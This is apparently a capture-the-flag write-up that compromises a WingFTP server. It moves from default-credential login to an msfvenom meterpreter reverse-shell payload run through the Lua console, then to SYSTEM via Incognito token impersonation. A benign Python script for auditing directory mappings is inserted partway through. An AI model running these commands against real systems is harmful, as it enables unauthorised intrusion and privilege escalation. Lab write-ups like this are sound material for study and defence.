nmap -A 172.31.1.20
We have several ports open; however, the important ones to notice here are ports 21 and 8080. Port 21 is running FTP, and port 8080 is running WingFTP, which is a graphical FTP manager.
Enumeration & Exploitation
Enumeration begins with visiting the webpage, which we are able to log in to with the default credentials admin:password. This quickly moves right into exploitation.
WingFTP login screen and Dashboard
Quickly poking around reveals that we are an administrative user and are able to create an FTP user, of which there currently are none.
We’ve created a user and granted them complete access to the file system. This is where the unintended exploit was discovered. WingFTP is running as a low-privilege user; however, by granting the access I did, I discovered that I was permitted to access the ENTIRE file system, including the Administrator directory, System32 files, etc. This is completely unintended, and after researching for some time I was unable to find anything in the wild suggesting this exploit has been discovered before. I’ll be doing more research on this to determine whether it’s simply a misconfiguration (which it shouldn’t be, given the user permissions on the underlying machine) or an actual zero-day exploit that hasn’t yet been discovered.
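The finding above is, from the defender’s side, a virtual-directory mapping that escapes the FTP data root. The script below is an added example (not WingFTP’s code, and the mapping format is a constructed stand-in for whatever the server actually stores) that audits a user’s directory mappings and flags any physical path that resolves outside the intended root, including traversal via `..`, mixed slashes and case differences.

```python
import ntpath

# Assumed FTP data root; every user mapping should resolve underneath it.
FTP_ROOT = r"C:\WingFTP\Data"

# Constructed sample for a user "lian": (virtual path, physical path, perms).
# The tuple layout is hypothetical, not WingFTP's real configuration format.
SAMPLE_MAPPINGS = [
    ("/",       r"C:\WingFTP\Data\lian",                          "RWX"),
    ("/shared", "C:/WingFTP/Data/pub/",                           "R"),
    ("/drive",  "C:\\",                                           "RWX"),  # whole drive
    ("/admin",  r"C:\WingFTP\Data\..\..\Users\Administrator",     "RWX"),  # traversal
]

def normalize(path):
    """Collapse separators, '.', '..' and case for a Windows-style path."""
    return ntpath.normcase(ntpath.normpath(path))

def is_within_root(physical, root):
    """True if `physical` is `root` itself or a path strictly below it."""
    phys = normalize(physical)
    base = normalize(root)
    # Separator-aware prefix test so C:\WingFTP\Data2 is not treated as a
    # child of C:\WingFTP\Data.
    return phys == base or phys.startswith(base.rstrip("\\") + "\\")

def audit(mappings, root=FTP_ROOT):
    """Return (virtual, resolved physical, perms, risk) for escaping mappings.

    Risk is 'high' when the escaping mapping is writable or executable, since
    that is what allows dropping and running a binary outside the data root.
    """
    findings = []
    for virtual, physical, perms in mappings:
        if not is_within_root(physical, root):
            risk = "high" if ("W" in perms or "X" in perms) else "medium"
            findings.append((virtual, normalize(physical), perms, risk))
    return findings

if __name__ == "__main__":
    for virtual, resolved, perms, risk in audit(SAMPLE_MAPPINGS):
        print(f"{risk.upper():6} {virtual} -> {resolved} [{perms}]")
```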
Now back to our regularly scheduled walkthrough.
We’ve now created our user and can leverage it to gain access to the FTP service on the machine. We’ll first log in to it, then create a payload with msfvenom, and then use the Lua Console in WingFTP to execute it and gain a reverse shell in Metasploit.
ftp 172.31.1.20 login
The lian user’s directory, where we will place our exploit (notice we have RWX permissions on Administrator)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=5555 -f exe > pwn.exe
put pwn.exe file upload
Metasploit Multi Handler and Payload parameters
Reverse shell via Lua Console execution – os.execute('cmd.exe /c C://Users/lian/pwn.exe')
At this point we have Meterpreter shell access to the machine and are able to enumerate our current user. We can first use the win_privs module to determine what our privileges are on the system.
Notice that we have Delegate and Impersonate privileges. To take advantage of this, we can use the Incognito module in Meterpreter.
load incognito; list_tokens -u
We notice that the NT AUTHORITY\SYSTEM token can be delegated, so we will use the impersonate_token command on it.
impersonate_token "NT AUTHORITY\SYSTEM"
With the token impersonated, all that’s left is to grab the flags and complete the challenge.
User and Administrator Flags